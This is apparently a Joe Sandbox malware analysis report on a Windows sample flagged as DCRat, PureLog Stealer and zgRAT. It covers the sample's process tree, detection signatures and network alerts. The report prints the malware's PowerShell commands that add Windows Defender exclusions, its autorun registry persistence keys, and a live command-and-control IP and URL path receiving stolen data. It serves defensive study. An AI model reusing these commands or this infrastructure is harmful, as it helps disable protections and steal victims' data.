Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
84JufgBTrA.exe

Overview

General Information

Sample name:84JufgBTrA.exe
renamed because original name is a hash value
Original sample name:3c9cf0b38226e2a7f0191a0130536859.exe
Analysis ID:1511007
MD5:3c9cf0b38226e2a7f0191a0130536859
SHA1:87d531257a15e18b50fa341bce9ac3c5a71ba80d
SHA256:4ac2ddb4fa2d1917ae491b5ac623e7ebf23e5e34667c63e5acd433cc6696c23d
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 84JufgBTrA.exe (PID: 5300 cmdline: "C:\Users\user\Desktop\84JufgBTrA.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
    • csc.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 1904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 1368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7928 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6316 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3384 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3140 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7680 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • MaEiPrsQRasQLtRzJjb.exe (PID: 8036 cmdline: "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
    • MaEiPrsQRasQLtRzJjb.exe (PID: 7328 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 1220 cmdline: C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 928 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 2992 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 7176 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 8184 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • svchost.exe (PID: 3236 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 7112 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 6696 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 7660 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 3336 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 5268 cmdline: "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 2380 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Process Memory Space: 84JufgBTrA.exe PID: 5300JoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: RuntimeBroker.exe PID: 7112JoeSecurity_DCRat_1Yara detected DCRatJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.84JufgBTrA.exe.1bb20000.19.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.84JufgBTrA.exe.1bb20000.19.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.84JufgBTrA.exe.1bb20000.19.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.84JufgBTrA.exe.1bb20000.19.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetFilename: C:\Recovery\RuntimeBroker.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
                      Sigma detected: System File Execution Location Anomaly
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\RuntimeBroker.exe, CommandLine: C:\Recovery\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\RuntimeBroker.exe, ProcessId: 2992, ProcessName: RuntimeBroker.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaEiPrsQRasQLtRzJjb
                      Sigma detected: CurrentVersion NT Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", ProcessId: 6388, ProcessName: csc.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
                      Sigma detected: Suspicious Powershell In Registry Run Keys
                      Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaEiPrsQRasQLtRzJjb
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetFilename: C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3236, ProcessName: svchost.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", ProcessId: 6388, ProcessName: csc.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-13T21:02:22.831881+020020480951A Network Trojan was detected192.168.2.44973431.177.108.21180TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 84JufgBTrA.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.phpAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\Desktop\DvHnLgjG.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                      Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\Desktop\DNOFZBcI.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                      Source: C:\Users\user\AppData\Local\Temp\OO0he60sKA.batAvira: detection malicious, Label: BAT/Delbat.C
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Multi AV Scanner detection for dropped file
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeReversingLabs: Detection: 68%
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeReversingLabs: Detection: 68%
                      Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\DvHnLgjG.logReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\FGdoLyOG.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\GbeNbtEV.logReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\IIQWghSC.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\IeQwxcIQ.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\QKxdLVJD.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\VMyCYnho.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\XbctOGCS.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\YKVbAlIQ.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\eqGsIhxV.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\hKwJyjHA.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\kvbZFwSt.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\pMdQdXyB.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\qJFYyXNw.logReversingLabs: Detection: 50%
                      Multi AV Scanner detection for submitted file
                      Source: 84JufgBTrA.exeReversingLabs: Detection: 68%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\Desktop\DvHnLgjG.logJoe Sandbox ML: detected
                      Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\DNOFZBcI.logJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: 84JufgBTrA.exeJoe Sandbox ML: detected
                      Source: 84JufgBTrA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\557bb37d3fa657Jump to behavior
                      Source: 84JufgBTrA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.pdb source: 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BA2866D
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 4x nop then jmp 00007FFD9B8C2656h41_2_00007FFD9B8C244E
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8A2656h48_2_00007FFD9B8A244E
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8C2656h50_2_00007FFD9B8C244E
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 4x nop then jmp 00007FFD9B8B2656h52_2_00007FFD9B8B244E
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8A2656h53_2_00007FFD9B8A244E

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 31.177.108.211:80
                      Source: Joe Sandbox ViewASN Name: UNILINK-ASRU UNILINK-ASRU
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 384Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
